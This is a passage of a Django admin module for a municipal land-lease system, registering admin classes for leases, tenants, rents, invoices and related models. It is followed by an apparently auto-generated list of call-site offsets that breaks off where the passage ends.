class TenantContactInline(FieldPermissionsAdminMixin, admin.TabularInline):
model = TenantContact
extra = 0
class TenantAdmin(FieldPermissionsModelAdmin):
list_display = ("lease",)
inlines = [TenantContactInline]
raw_id_fields = ("lease",)
def get_queryset(self, request):
qs = super().get_queryset(request)
return qs.select_related(
"lease__type",
"lease__municipality",
"lease__district",
"lease__identifier",
"lease__identifier__type",
"lease__identifier__municipality",
"lease__identifier__district",
)
class RelatedLeaseInline(FieldPermissionsAdminMixin, admin.TabularInline):
model = RelatedLease
fk_name = "from_lease"
raw_id_fields = ("from_lease", "to_lease")
extra = 0
class LeaseBasisOfRentInline(FieldPermissionsAdminMixin, admin.TabularInline):
model = LeaseBasisOfRent
extra = 0
class LeaseIdentifierAdmin(FieldPermissionsModelAdmin):
def get_queryset(self, request):
qs = super().get_queryset(request)
return qs.select_related("type", "municipality", "district")
class LeaseAdmin(FieldPermissionsAdminMixin, admin.ModelAdmin):
inlines = [RelatedLeaseInline, LeaseBasisOfRentInline]
raw_id_fields = ("identifier",)
def get_queryset(self, request):
qs = super().get_queryset(request)
return qs.select_related(
"type",
"municipality",
"district",
"identifier",
"identifier__type",
"identifier__municipality",
"identifier__district",
)
class CollectionCourtDecisionAdmin(FieldPermissionsModelAdmin):
list_display = ("lease", "file", "uploaded_at", "uploader")
raw_id_fields = ("lease",)
ordering = ("-uploaded_at",)
class CollectionLetterAdmin(FieldPermissionsModelAdmin):
list_display = ("lease", "file", "uploaded_at", "uploader")
raw_id_fields = ("lease",)
ordering = ("-uploaded_at",)
class CollectionNoteAdmin(FieldPermissionsModelAdmin):
list_display = ("lease", "created_at", "note", "user")
raw_id_fields = ("lease",)
ordering = ("-created_at",)
class CollectionLetterTemplateAdmin(admin.ModelAdmin):
list_display = ("name", "modified_at")
ordering = ("name",)
class CommentAdmin(FieldPermissionsModelAdmin):
list_display = ("lease", "topic", "user", "created_at", "modified_at")
raw_id_fields = ("lease",)
class ContractChangeInline(FieldPermissionsAdminMixin, admin.StackedInline):
model = ContractChange
extra = 0
class CollateralInline(FieldPermissionsAdminMixin, admin.StackedInline):
model = Collateral
extra = 0
class ContractAdmin(FieldPermissionsModelAdmin):
list_display = ("lease", "type", "contract_number")
inlines = [ContractChangeInline, CollateralInline]
raw_id_fields = ("lease",)
def get_queryset(self, request):
qs = super().get_queryset(request)
return qs.select_related(
"type",
"lease__type",
"lease__municipality",
"lease__district",
"lease__identifier",
"lease__identifier__type",
"lease__identifier__municipality",
"lease__identifier__district",
)
class ConditionInline(FieldPermissionsAdminMixin, admin.StackedInline):
model = Condition
extra = 0
class DecisionAdmin(FieldPermissionsModelAdmin):
list_display = ("lease", "reference_number", "decision_maker", "type")
inlines = [ConditionInline]
raw_id_fields = ("lease",)
def get_queryset(self, request):
qs = super().get_queryset(request)
return qs.select_related(
"decision_maker",
"type",
"lease__type",
"lease__municipality",
"lease__district",
"lease__identifier",
"lease__identifier__type",
"lease__identifier__municipality",
"lease__identifier__district",
)
class DecisionTypeAdmin(NameAdmin):
list_display = ("name", "kind")
class InspectionAdmin(FieldPermissionsModelAdmin):
list_display = ("lease", "inspector", "supervision_date", "supervised_date")
raw_id_fields = ("lease",)
def get_queryset(self, request):
qs = super().get_queryset(request)
return qs.select_related(
"lease__type",
"lease__municipality",
"lease__district",
"lease__identifier",
"lease__identifier__type",
"lease__identifier__municipality",
"lease__identifier__district",
)
class LeaseTypeAdmin(admin.ModelAdmin):
list_display = ("name", "identifier", "id")
search_fields = ["name", "identifier", "id"]
ordering = ("identifier",)
class RentDueDateInline(FieldPermissionsAdminMixin, admin.TabularInline):
model = RentDueDate
extra = 0
class FixedInitialYearRentInline(FieldPermissionsAdminMixin, admin.TabularInline):
model = FixedInitialYearRent
extra = 0
class ContractRentInline(FieldPermissionsAdminMixin, admin.TabularInline):
model = ContractRent
extra = 0
class RentAdjustmentInline(FieldPermissionsAdminMixin, admin.TabularInline):
model = RentAdjustment
extra = 0
class RentAdmin(FieldPermissionsModelAdmin):
list_display = ("lease", "type")
inlines = [
RentDueDateInline,
FixedInitialYearRentInline,
ContractRentInline,
RentAdjustmentInline,
]
raw_id_fields = ("lease",)
def get_queryset(self, request):
qs = super().get_queryset(request)
return qs.select_related(
"lease__type",
"lease__municipality",
"lease__district",
"lease__identifier",
"lease__identifier__type",
"lease__identifier__municipality",
"lease__identifier__district",
)
class BasisOfRentPropertyIdentifierInline(
FieldPermissionsAdminMixin, admin.TabularInline
):
model = BasisOfRentPropertyIdentifier
extra = 0
class BasisOfRentDecisionInline(FieldPermissionsAdminMixin, admin.TabularInline):
model = BasisOfRentDecision
extra = 0
class BasisOfRentRateInline(FieldPermissionsAdminMixin, admin.TabularInline):
model = BasisOfRentRate
extra = 0
class BasisOfRentAdmin(FieldPermissionsModelAdmin):
list_display = ("id", "plot_type", "management", "financing")
inlines = [
BasisOfRentPropertyIdentifierInline,
BasisOfRentDecisionInline,
BasisOfRentRateInline,
]
def get_queryset(self, request):
qs = super().get_queryset(request)
return qs.select_related(
"plot_type", "management", "financing", "index"
).prefetch_related(
"rent_rates",
"property_identifiers",
"decisions",
"decisions__decision_maker",
)
class IndexAdmin(admin.ModelAdmin):
list_display = ("year", "month", "number")
class InfillDevelopmentCompensationAdmin(FieldPermissionsModelAdmin):
list_display = ("name", "reference_number", "state")
class InfillDevelopmentCompensationDecisionInline(
FieldPermissionsAdminMixin, admin.StackedInline
):
model = InfillDevelopmentCompensationDecision
extra = 0
class InfillDevelopmentCompensationIntendedUseInline(
FieldPermissionsAdminMixin, admin.StackedInline
):
model = InfillDevelopmentCompensationIntendedUse
extra = 0
class InfillDevelopmentCompensationAttachmentInline(
FieldPermissionsAdminMixin, admin.StackedInline
):
model = InfillDevelopmentCompensationAttachment
extra = 0
class InfillDevelopmentCompensationLeaseAdmin(FieldPermissionsModelAdmin):
raw_id_fields = ("lease",)
inlines = [
InfillDevelopmentCompensationDecisionInline,
InfillDevelopmentCompensationIntendedUseInline,
InfillDevelopmentCompensationAttachmentInline,
]
list_display = ("infill_development_compensation", "lease")
def get_queryset(self, request):
qs = super().get_queryset(request)
return qs.select_related(
"lease__type",
"lease__municipality",
"lease__district",
"lease__identifier",
"lease__identifier__type",
"lease__identifier__municipality",
"lease__identifier__district",
)
class InterestRateAdmin(admin.ModelAdmin):
list_display = ("start_date", "end_date", "reference_rate", "penalty_rate")
ordering = ("-start_date", "-end_date")
class InvoicePaymentInline(FieldPermissionsAdminMixin, admin.TabularInline):
model = InvoicePayment
extra = 0
class InvoiceRowInline(FieldPermissionsAdminMixin, admin.TabularInline):
model = InvoiceRow
extra = 0
raw_id_fields = ("tenant",)
class InvoiceAdmin(FieldPermissionsModelAdmin):
list_display = (
"lease",
"due_date",
"billing_period_start_date",
"billing_period_end_date",
"total_amount",
)
inlines = [InvoiceRowInline, InvoicePaymentInline]
raw_id_fields = ("lease", "invoiceset", "credited_invoice", "interest_invoice_for")
def get_queryset(self, request):
qs = super().get_queryset(request)
return qs.select_related(
"lease__type",
"lease__municipality",
"lease__district",
"lease__identifier",
"lease__identifier__type",
"lease__identifier__municipality",
"lease__identifier__district",
)
class InvoiceSetAdmin(admin.ModelAdmin):
list_display = ("lease", "billing_period_start_date", "billing_period_end_date")
raw_id_fields = ("lease",)
def get_queryset(self, request):
qs = super().get_queryset(request)
return qs.select_related(
"lease__type",
"lease__municipality",
"lease__district",
"lease__identifier",
"lease__identifier__type",
"lease__identifier__municipality",
"lease__identifier__district",
)
class InvoiceNoteAdmin(admin.ModelAdmin):
list_display = (
"lease",
"billing_period_start_date",
"billing_period_end_date",
"notes",
)
raw_id_fields = ("lease",)
def get_queryset(self, request):
qs = super().get_queryset(request)
return qs.select_related(
"lease__type",
"lease__municipality",
"lease__district",
"lease__identifier",
"lease__identifier__type",
"lease__identifier__municipality",
"lease__identifier__district",
)
class ConstructabilityDescriptionInline(
FieldPermissionsAdminMixin, admin.TabularInline
):
model = ConstructabilityDescription
extra = 0
class PlotInline(FieldPermissionsAdminMixin, admin.StackedInline):
model = Plot
extra = 0
class PlanUnitInline(FieldPermissionsAdminMixin, admin.StackedInline):
model = PlanUnit
extra = 0
class LeaseAreaAddressInline(FieldPermissionsAdminMixin, admin.TabularInline):
model = LeaseAreaAddress
extra = 0
class LeaseAreaAdmin(FieldPermissionsModelAdmin):
list_display = ("lease", "type")
inlines = [
LeaseAreaAddressInline,
ConstructabilityDescriptionInline,
PlotInline,
PlanUnitInline,
]
raw_id_fields = ("lease",)
def get_queryset(self, request):
qs = super().get_queryset(request)
return qs.select_related(
"lease__type",
"lease__municipality",
"lease__district",
"lease__identifier",
"lease__identifier__type",
"lease__identifier__municipality",
"lease__identifier__district",
)
class PlotAdmin(FieldPermissionsModelAdmin):
list_display = ("lease_area", "type")
raw_id_fields = ("lease_area",)
class LeaseStateLogAdmin(admin.ModelAdmin):
list_display = ("lease", "state")
raw_id_fields = ("lease",)
readonly_fields = ("created_at", "modified_at")
def get_queryset(self, request):
qs = super().get_queryset(request)
return qs.select_related(
"lease__type",
"lease__municipality",
"lease__district",
"lease__identifier",
"lease__identifier__type",
"lease__identifier__municipality",
"lease__identifier__district",
)
class PlanUnitAdmin(FieldPermissionsModelAdmin):
list_display = ("get_lease_identifier", "lease_area")
raw_id_fields = ("lease_area",)
def get_lease_identifier(self, obj):
return str(obj.lease_area.lease)
get_lease_identifier.short_description = _("Lease")
def get_queryset(self, request):
qs = super().get_queryset(request)
return qs.select_related("lease_area", "lease_area__lease")
class PlotSearchAdmin(FieldPermissionsAdminMixin, admin.ModelAdmin):
list_display = ("name",)
def get_queryset(self, request):
qs = super().get_queryset(request)
return qs.select_related("subtype", "stage",)
class VatAdmin(admin.ModelAdmin):
list_display = ("percent", "start_date", "end_date")
class UiDataAdmin(admin.ModelAdmin):
list_display = ("user", "key")
list_filter = ("user", "key")
ordering = ("-user",)
class ReadOnlyTabularInline(admin.TabularInline):
can_delete = False
def has_add_permission(self, request, obj=None):
return False
def has_change_permission(self, request, obj=None):
return False
class LeaseholdTransferPartyInline(ReadOnlyTabularInline):
model = LeaseholdTransferParty
class LeaseholdTransferPropertyInline(ReadOnlyTabularInline):
model = LeaseholdTransferProperty
class LeaseholdTransferAdmin(admin.ModelAdmin):
inlines = [LeaseholdTransferPartyInline, LeaseholdTransferPropertyInline]
readonly_fields = ("institution_identifier", "decision_date")
class LeaseholdTransferImportLogAdmin(admin.ModelAdmin):
list_display = ("file_name", "created_at", "modified_at")
readonly_fields = ("created_at", "modified_at")
ordering = ("id",)
class LandUseAgreementAddressInline(admin.TabularInline):
model = LandUseAgreementAddress
extra = 0
class LandUseAgreementDecisionConditionInline(
FieldPermissionsAdminMixin, admin.StackedInline
):
model = LandUseAgreementDecisionCondition
extra = 0
class LandUseAgreementDecisionAdmin(admin.ModelAdmin):
inlines = [LandUseAgreementDecisionConditionInline]
class LandUseAgreementAdmin(admin.ModelAdmin):
inlines = [LandUseAgreementAddressInline]
admin.site.register(Area, AreaAdmin)
admin.site.register(AreaSource, AreaSourceAdmin)
admin.site.register(AreaNote, AreaNoteAdmin)
admin.site.register(BankHoliday)
admin.site.register(Contact, ContactAdmin)
admin.site.register(Comment, CommentAdmin)
admin.site.register(CommentTopic, NameAdmin)
admin.site.register(CollateralType, NameAdmin)
admin.site.register(CollectionCourtDecision, CollectionCourtDecisionAdmin)
admin.site.register(CollectionLetter, CollectionLetterAdmin)
admin.site.register(CollectionLetterTemplate, CollectionLetterTemplateAdmin)
admin.site.register(CollectionNote, CollectionNoteAdmin)
admin.site.register(District, DistrictAdmin)
admin.site.register(Financing, NameAdmin)
admin.site.register(Hitas, NameAdmin)
admin.site.register(Index, IndexAdmin)
admin.site.register(InfillDevelopmentCompensation, InfillDevelopmentCompensationAdmin)
admin.site.register(
InfillDevelopmentCompensationLease, InfillDevelopmentCompensationLeaseAdmin
)
admin.site.register(IntendedUse, NameAdmin)
admin.site.register(InterestRate, InterestRateAdmin)
admin.site.register(Inspection, InspectionAdmin)
admin.site.register(Invoice, InvoiceAdmin)
admin.site.register(InvoiceNote, InvoiceNoteAdmin)
admin.site.register(InvoiceSet, InvoiceSetAdmin)
admin.site.register(Lease, LeaseAdmin)
admin.site.register(LeaseArea, LeaseAreaAdmin)
admin.site.register(LeaseIdentifier, LeaseIdentifierAdmin)
admin.site.register(LeaseStateLog, LeaseStateLogAdmin)
admin.site.register(LeaseType, LeaseTypeAdmin)
admin.site.register(LeaseholdTransfer, LeaseholdTransferAdmin)
admin.site.register(LeaseholdTransferImportLog, LeaseholdTransferImportLogAdmin)
admin.site.register(Management, NameAdmin)
admin.site.register(Municipality, MunicipalityAdmin)
admin.site.register(NoticePeriod)
admin.site.register(Plot, PlotAdmin)
admin.site.register(PlanUnit, PlanUnitAdmin)
admin.site.register(PlanUnitState, NameAdmin)
admin.site.register(PlanUnitIntendedUse, NameAdmin)
admin.site.register(PlanUnitType, NameAdmin)
admin.site.register(PlotDivisionState, NameAdmin)
admin.site.register(PlotSearch, PlotSearchAdmin)
admin.site.register(PlotSearchStage, NameAdmin)
admin.site.register(PlotSearchSubtype, NameAdmin)
admin.site.register(PlotSearchType, NameAdmin)
admin.site.register(ReceivableType)
admin.site.register(Regulation, NameAdmin)
admin.site.register(Rent, RentAdmin)
admin.site.register(RentIntendedUse, NameAdmin)
admin.site.register(ReservationProcedure, NameAdmin)
admin.site.register(SpecialProject, NameAdmin)
admin.site.register(StatisticalUse, NameAdmin)
admin.site.register(SupportiveHousing, NameAdmin)
admin.site.register(Tenant, TenantAdmin)
admin.site.register(TenantContact, TenantContactAdmin)
admin.site.register(Contract, ContractAdmin)
admin.site.register(ContractType, NameAdmin)
admin.site.register(Decision, DecisionAdmin)
admin.site.register(DecisionType, DecisionTypeAdmin)
admin.site.register(DecisionMaker, NameAdmin)
admin.site.register(ConditionType, NameAdmin)
admin.site.register(BasisOfRent, BasisOfRentAdmin)
admin.site.register(BasisOfRentPlotType, NameAdmin)
admin.site.register(BasisOfRentBuildPermissionType, NameAdmin)
admin.site.register(UiData, UiDataAdmin)
admin.site.register(Vat, VatAdmin)
admin.site.register(LandUseAgreementType, NameAdmin)
admin.site.register(LandUseAgreementStatus, NameAdmin)
admin.site.register(LandUseAgreementDefinition, NameAdmin)
admin.site.register(LandUseAgreementDecisionType, NameAdmin)
admin.site.register(LandUseAgreementConditionFormOfManagement, NameAdmin)
admin.site.register(LandUseAgreementDecisionConditionType, NameAdmin)
admin.site.register(LandUseAgreementDecision, LandUseAgreementDecisionAdmin)
admin.site.register(LandUseAgreement, LandUseAgreementAdmin)
|
[
"django.contrib.gis.admin.site.register",
"django.utils.translation.ugettext_lazy"
] |
[((19480, 19516), 'django.contrib.gis.admin.site.register', 'admin.site.register', (['Area', 'AreaAdmin'], {}), '(Area, AreaAdmin)\n', (19499, 19516), False, 'from django.contrib.gis import admin\n'), ((19517, 19565), 'django.contrib.gis.admin.site.register', 'admin.site.register', (['AreaSource', 'AreaSourceAdmin'], {}), '(AreaSource, AreaSourceAdmin)\n', (19536, 19565), False, 'from django.contrib.gis import admin\n'), ((19566, 19610), 'django.contrib.gis.admin.site.register', 'admin.site.register', (['AreaNote', 'AreaNoteAdmin'], {}), '(AreaNote, AreaNoteAdmin)\n', (19585, 19610), False, 'from django.contrib.gis import admin\n'), ((19611, 19643), 'django.contrib.gis.admin.site.register', 'admin.site.register', (['BankHoliday'], {}), '(BankHoliday)\n', (19630, 19643), False, 'from django.contrib.gis import admin\n'), ((19644, 19686), 'django.contrib.gis.admin.site.register', 'admin.site.register', (['Contact', 'ContactAdmin'], {}), '(Contact, ContactAdmin)\n', (19663, 19686), False, 'from django.contrib.gis import admin\n'), ((19687, 19729), 'django.contrib.gis.admin.site.register', 'admin.site.register', (['Comment', 'CommentAdmin'], {}), '(Comment, CommentAdmin)\n', (19706, 19729), False, 'from django.contrib.gis import admin\n'), ((19730, 19774), 'django.contrib.gis.admin.site.register', 'admin.site.register', (['CommentTopic', 'NameAdmin'], {}), '(CommentTopic, NameAdmin)\n', (19749, 19774), False, 'from django.contrib.gis import admin\n'), ((19775, 19821), 'django.contrib.gis.admin.site.register', 'admin.site.register', (['CollateralType', 'NameAdmin'], {}), '(CollateralType, NameAdmin)\n', (19794, 19821), False, 'from django.contrib.gis import admin\n'), ((19822, 19896), 'django.contrib.gis.admin.site.register', 'admin.site.register', (['CollectionCourtDecision', 'CollectionCourtDecisionAdmin'], {}), '(CollectionCourtDecision, CollectionCourtDecisionAdmin)\n', (19841, 19896), False, 'from django.contrib.gis import admin\n'), ((19897, 19957), 'django.contrib.gis.admin.site.register', 'admin.site.register', (['CollectionLetter', 'CollectionLetterAdmin'], {}), '(CollectionLetter, CollectionLetterAdmin)\n', (19916, 19957), False, 'from django.contrib.gis import admin\n'), ((19958, 20034), 'django.contrib.gis.admin.site.register', 'admin.site.register', (['CollectionLetterTemplate', 'CollectionLetterTemplateAdmin'], {}), '(CollectionLetterTemplate, CollectionLetterTemplateAdmin)\n', (19977, 20034), False, 'from django.contrib.gis import admin\n'), ((20035, 20091), 'django.contrib.gis.admin.site.register', 'admin.site.register', (['CollectionNote', 'CollectionNoteAdmin'], {}), '(CollectionNote, CollectionNoteAdmin)\n', (20054, 20091), False, 'from django.contrib.gis import admin\n'), ((20092, 20136), 'django.contrib.gis.admin.site.register', 'admin.site.register', (['District', 'DistrictAdmin'], {}), '(District, DistrictAdmin)\n', (20111, 20136), False, 'from django.contrib.gis import admin\n'), ((20137, 20178), 'django.contrib.gis.admin.site.register', 'admin.site.register', (['Financing', 'NameAdmin'], {}), '(Financing, NameAdmin)\n', (20156, 20178), False, 'from django.contrib.gis import admin\n'), ((20179, 20216), 'django.contrib.gis.admin.site.register', 'admin.site.register', (['Hitas', 'NameAdmin'], {}), '(Hitas, NameAdmin)\n', (20198, 20216), False, 'from django.contrib.gis import admin\n'), ((20217, 20255), 'django.contrib.gis.admin.site.register', 'admin.site.register', (['Index', 'IndexAdmin'], {}), '(Index, IndexAdmin)\n', (20236, 20255), False, 'from django.contrib.gis import admin\n'), ((20256, 20346), 'django.contrib.gis.admin.site.register', 'admin.site.register', (['InfillDevelopmentCompensation', 'InfillDevelopmentCompensationAdmin'], {}), '(InfillDevelopmentCompensation,\n InfillDevelopmentCompensationAdmin)\n', (20275, 20346), False, 'from django.contrib.gis import admin\n'), ((20343, 20443), 'django.contrib.gis.admin.site.register', 'admin.site.register', (['InfillDevelopmentCompensationLease', 'InfillDevelopmentCompensationLeaseAdmin'], {}), '(InfillDevelopmentCompensationLease,\n InfillDevelopmentCompensationLeaseAdmin)\n', (20362, 20443), False, 'from django.contrib.gis import admin\n'), ((20446, 20489), 'django.contrib.gis.admin.site.register', 'admin.site.register', (['IntendedUse', 'NameAdmin'], {}), '(IntendedUse, NameAdmin)\n', (20465, 20489), False, 'from django.contrib.gis import admin\n'), ((20490, 20542), 'django.contrib.gis.admin.site.register', 'admin.site.register', (['InterestRate', 'InterestRateAdmin'], {}), '(InterestRate, InterestRateAdmin)\n', (20509, 20542), False, 'from django.contrib.gis import admin\n'), ((20543, 20591), 'django.contrib.gis.admin.site.register', 'admin.site.register', (['Inspection', 'InspectionAdmin'], {}), '(Inspection, InspectionAdmin)\n', (20562, 20591), False, 'from django.contrib.gis import admin\n'), ((20592, 20634), 'django.contrib.gis.admin.site.register', 'admin.site.register', (['Invoice', 'InvoiceAdmin'], {}), '(Invoice, InvoiceAdmin)\n', (20611, 20634), False, 'from django.contrib.gis import admin\n'), ((20635, 20685), 'django.contrib.gis.admin.site.register', 'admin.site.register', (['InvoiceNote', 'InvoiceNoteAdmin'], {}), '(InvoiceNote, InvoiceNoteAdmin)\n', (20654, 20685), False, 'from django.contrib.gis import admin\n'), ((20686, 20734), 'django.contrib.gis.admin.site.register', 'admin.site.register', (['InvoiceSet', 'InvoiceSetAdmin'], {}), '(InvoiceSet, InvoiceSetAdmin)\n', (20705, 20734), False, 'from django.contrib.gis import admin\n'), ((20735, 20773), 'django.contrib.gis.admin.site.register', 'admin.site.register', (['Lease', 'LeaseAdmin'], {}), '(Lease, LeaseAdmin)\n', (20754, 20773), False, 'from django.contrib.gis import admin\n'), ((20774, 20820), 'django.contrib.gis.admin.site.register', 'admin.site.register', (['LeaseArea', 'LeaseAreaAdmin'], {}), '(LeaseArea, LeaseAreaAdmin)\n', (20793, 20820), False, 'from django.contrib.gis import admin\n'), ((20821, 20879), 'django.contrib.gis.admin.site.register', 'admin.site.register', (['LeaseIdentifier', 'LeaseIdentifierAdmin'], {}), '(LeaseIdentifier, LeaseIdentifierAdmin)\n', (20840, 20879), False, 'from django.contrib.gis import admin\n'), ((20880, 20934), 'django.contrib.gis.admin.site.register', 'admin.site.register', (['LeaseStateLog', 'LeaseStateLogAdmin'], {}), '(LeaseStateLog, LeaseStateLogAdmin)\n', (20899, 20934), False, 'from django.contrib.gis import admin\n'), ((20935, 20981), 'django.contrib.gis.admin.site.register', 'admin.site.register', (['LeaseType', 'LeaseTypeAdmin'], {}), '(LeaseType, LeaseTypeAdmin)\n', (20954, 20981), False, 'from django.contrib.gis import admin\n'), ((20982, 21044), 'django.contrib.gis.admin.site.register', 'admin.site.register', (['LeaseholdTransfer', 'LeaseholdTransferAdmin'], {}), '(LeaseholdTransfer, LeaseholdTransferAdmin)\n', (21001, 21044), False, 'from django.contrib.gis import admin\n'), ((21045, 21130), 'django.contrib.gis.admin.site.register', 'admin.site.register', (['LeaseholdTransferImportLog', 'LeaseholdTransferImportLogAdmin'], {}), '(LeaseholdTransferImportLog, LeaseholdTransferImportLogAdmin\n )\n', (21064, 21130), False, 'from django.contrib.gis import admin\n'), ((21126, 21168), 'django.contrib.gis.admin.site.register', 'admin.site.register', (['Management', 'NameAdmin'], {}), '(Management, NameAdmin)\n', (21145, 21168), False, 'from django.contrib.gis import admin\n'), ((21169, 21221), 'django.contrib.gis.admin.site.register', 'admin.site.register', (['Municipality', 'MunicipalityAdmin'], {}), '(Municipality, MunicipalityAdmin)\n', (21188, 21221), False, 'from django.contrib.gis import admin\n'), ((21222, 21255), 'django.contrib.gis.admin.site.register', 'admin.site.register', (['NoticePeriod'], {}), '(NoticePeriod)\n', (21241, 21255), False, 'from django.contrib.gis import admin\n'), ((21256, 21292), 'django.contrib.gis.admin.site.register', 'admin.site.register', (['Plot', 'PlotAdmin'], {}), '(Plot, PlotAdmin)\n', (21275, 21292), False, 'from django.contrib.gis import admin\n'), ((21293, 21337), 'django.contrib.gis.admin.site.register', 'admin.site.register', (['PlanUnit', 'PlanUnitAdmin'], {}), '(PlanUnit, PlanUnitAdmin)\n', (21312, 21337), False, 'from django.contrib.gis import admin\n'), ((21338, 21383), 'django.contrib.gis.admin.site.register', 'admin.site.register', (['PlanUnitState', 'NameAdmin'], {}), '(PlanUnitState, NameAdmin)\n', (21357, 21383), False, 'from django.contrib.gis import admin\n'), ((21384, 21435), 'django.contrib.gis.admin.site.register', 'admin.site.register', (['PlanUnitIntendedUse', 'NameAdmin'], {}), '(PlanUnitIntendedUse, NameAdmin)\n', (21403, 21435), False, 'from django.contrib.gis import admin\n'), ((21436, 21480), 'django.contrib.gis.admin.site.register', 'admin.site.register', (['PlanUnitType', 'NameAdmin'], {}), '(PlanUnitType, NameAdmin)\n', (21455, 21480), False, 'from django.contrib.gis import admin\n'), ((21481, 21530), 'django.contrib.gis.admin.site.register', 'admin.site.register', (['PlotDivisionState', 'NameAdmin'], {}), '(PlotDivisionState, NameAdmin)\n', (21500, 21530), False, 'from django.contrib.gis import admin\n'), ((21531, 21579), 'django.contrib.gis.admin.site.register', 'admin.site.register', (['PlotSearch', 'PlotSearchAdmin'], {}), '(PlotSearch, PlotSearchAdmin)\n', (21550, 21579), False, 'from django.contrib.gis import admin\n'), ((21580, 21627), 'django.contrib.gis.admin.site.register', 'admin.site.register', (['PlotSearchStage', 'NameAdmin'], {}), '(PlotSearchStage, NameAdmin)\n', (21599, 21627), False, 'from django.contrib.gis import admin\n'), ((21628, 21677), 'django.contrib.gis.admin.site.register', 'admin.site.register', (['PlotSearchSubtype', 'NameAdmin'], {}), '(PlotSearchSubtype, NameAdmin)\n', (21647, 21677), False, 'from django.contrib.gis import admin\n'), ((21678, 21724), 'django.contrib.gis.admin.site.register', 'admin.site.register', (['PlotSearchType', 'NameAdmin'], {}), '(PlotSearchType, NameAdmin)\n', (21697, 21724), False, 'from django.contrib.gis import admin\n'), ((21725, 21760), 'django.contrib.gis.admin.site.register', 'admin.site.register', (['ReceivableType'], {}), '(ReceivableType)\n', (21744, 21760), False, 'from django.contrib.gis import admin\n'), ((21761, 21803), 'django.contrib.gis.admin.site.register', 'admin.site.register', (['Regulation', 'NameAdmin'], {}), '(Regulation, NameAdmin)\n', (21780, 21803), False, 'from django.contrib.gis import admin\n'), ((21804, 21840), 'django.contrib.gis.admin.site.register', 'admin.site.register', (['Rent', 'RentAdmin'], {}), '(Rent, RentAdmin)\n', (21823, 21840), False, 'from django.contrib.gis import admin\n'), ((21841, 21888), 'django.contrib.gis.admin.site.register', 'admin.site.register', (['RentIntendedUse', 'NameAdmin'], {}), '(RentIntendedUse, NameAdmin)\n', (21860, 21888), False, 'from django.contrib.gis import admin\n'), ((21889, 21941), 'django.contrib.gis.admin.site.register', 'admin.site.register', (['ReservationProcedure', 'NameAdmin'], {}), '(ReservationProcedure, NameAdmin)\n', (21908, 21941), False, 'from django.contrib.gis import admin\n'), ((21942, 21988), 'django.contrib.gis.admin.site.register', 'admin.site.register', (['SpecialProject', 'NameAdmin'], {}), '(SpecialProject, NameAdmin)\n', (21961, 21988), False, 'from django.contrib.gis import admin\n'), ((21989, 22035), 'django.contrib.gis.admin.site.register', 'admin.site.register', (['StatisticalUse', 'NameAdmin'], {}), '(StatisticalUse, NameAdmin)\n', (22008, 22035), False, 'from django.contrib.gis import admin\n'), ((22036, 22085), 'django.contrib.gis.admin.site.register', 'admin.site.register', (['SupportiveHousing', 'NameAdmin'], {}), '(SupportiveHousing, NameAdmin)\n', (22055, 22085), False, 'from django.contrib.gis import admin\n'), ((22086, 22126), 'django.contrib.gis.admin.site.register', 'admin.site.register', (['Tenant', 'TenantAdmin'], {}), '(Tenant, TenantAdmin)\n', (22105, 22126), False, 'from django.contrib.gis import admin\n'), ((22127, 22181), 'django.contrib.gis.admin.site.register', 'admin.site.register', (['TenantContact', 'TenantContactAdmin'], {}), '(TenantContact, TenantContactAdmin)\n', (22146, 22181), False, 'from django.contrib.gis import admin\n'), ((22182, 22226), 'django.contrib.gis.admin.site.register', 'admin.site.register', (['Contract', 'ContractAdmin'], {}), '(Contract, ContractAdmin)\n', (22201, 22226), False, 'from django.contrib.gis import admin\n'), ((22227, 22271), 'django.contrib.gis.admin.site.register', 'admin.site.register', (['ContractType', 'NameAdmin'], {}), '(ContractType, NameAdmin)\n', (22246, 22271), False, 'from django.contrib.gis import admin\n'), ((22272, 22316), 'django.contrib.gis.admin.site.register', 'admin.site.register', (['Decision', 'DecisionAdmin'], {}), '(Decision, DecisionAdmin)\n', (22291, 22316), False, 'from django.contrib.gis import admin\n'), ((22317, 22369), 'django.contrib.gis.admin.site.register', 'admin.site.register', (['DecisionType', 'DecisionTypeAdmin'], {}), '(DecisionType, DecisionTypeAdmin)\n', (22336, 22369), False, 'from django.contrib.gis import admin\n'), ((22370, 22415), 'django.contrib.gis.admin.site.register', 'admin.site.register', (['DecisionMaker', 'NameAdmin'], {}), '(DecisionMaker, NameAdmin)\n', (22389, 22415), False, 'from django.contrib.gis import admin\n'), ((22416, 22461), 'django.contrib.gis.admin.site.register', 'admin.site.register', (['ConditionType', 'NameAdmin'], {}), '(ConditionType, NameAdmin)\n', (22435, 22461), False, 'from django.contrib.gis import admin\n'), ((22462, 22512), 'django.contrib.gis.admin.site.register', 'admin.site.register', (['BasisOfRent', 'BasisOfRentAdmin'], {}), '(BasisOfRent, BasisOfRentAdmin)\n', (22481, 22512), False, 'from django.contrib.gis import admin\n'), ((22513, 22564), 'django.contrib.gis.admin.site.register', 'admin.site.register', (['BasisOfRentPlotType', 'NameAdmin'], {}), '(BasisOfRentPlotType, NameAdmin)\n', (22532, 22564), False, 'from django.contrib.gis import admin\n'), ((22565, 22627), 'django.contrib.gis.admin.site.register', 'admin.site.register', (['BasisOfRentBuildPermissionType', 'NameAdmin'], {}), '(BasisOfRentBuildPermissionType, NameAdmin)\n', (22584, 22627), False, 'from django.contrib.gis import admin\n'), ((22628, 22668), 'django.contrib.gis.admin.site.register', 'admin.site.register', (['UiData', 'UiDataAdmin'], {}), '(UiData, UiDataAdmin)\n', (22647, 22668), False, 'from django.contrib.gis import admin\n'), ((22669, 22703), 'django.contrib.gis.admin.site.register', 'admin.site.register', (['Vat', 'VatAdmin'], {}), '(Vat, VatAdmin)\n', (22688, 22703), False, 'from django.contrib.gis import admin\n'), ((22705, 22757), 'django.contrib.gis.admin.site.register', 'admin.site.register', (['LandUseAgreementType', 'NameAdmin'], {}), '(LandUseAgreementType, NameAdmin)\n', (22724, 22757), False, 'from django.contrib.gis import admin\n'), ((22758, 22812), 'django.contrib.gis.admin.site.register', 'admin.site.register', (['LandUseAgreementStatus', 'NameAdmin'], {}), '(LandUseAgreementStatus, NameAdmin)\n', (22777, 22812), False, 'from django.contrib.gis import admin\n'), ((22813, 22871), 'django.contrib.gis.admin.site.register', 'admin.site.register', (['LandUseAgreementDefinition', 'NameAdmin'], {}), '(LandUseAgreementDefinition, NameAdmin)\n', (22832, 22871), False, 'from django.contrib.gis import admin\n'), ((22872, 22932), 'django.contrib.gis.admin.site.register', 'admin.site.register', (['LandUseAgreementDecisionType', 'NameAdmin'], {}), '(LandUseAgreementDecisionType, NameAdmin)\n', (22891, 22932), False, 'from 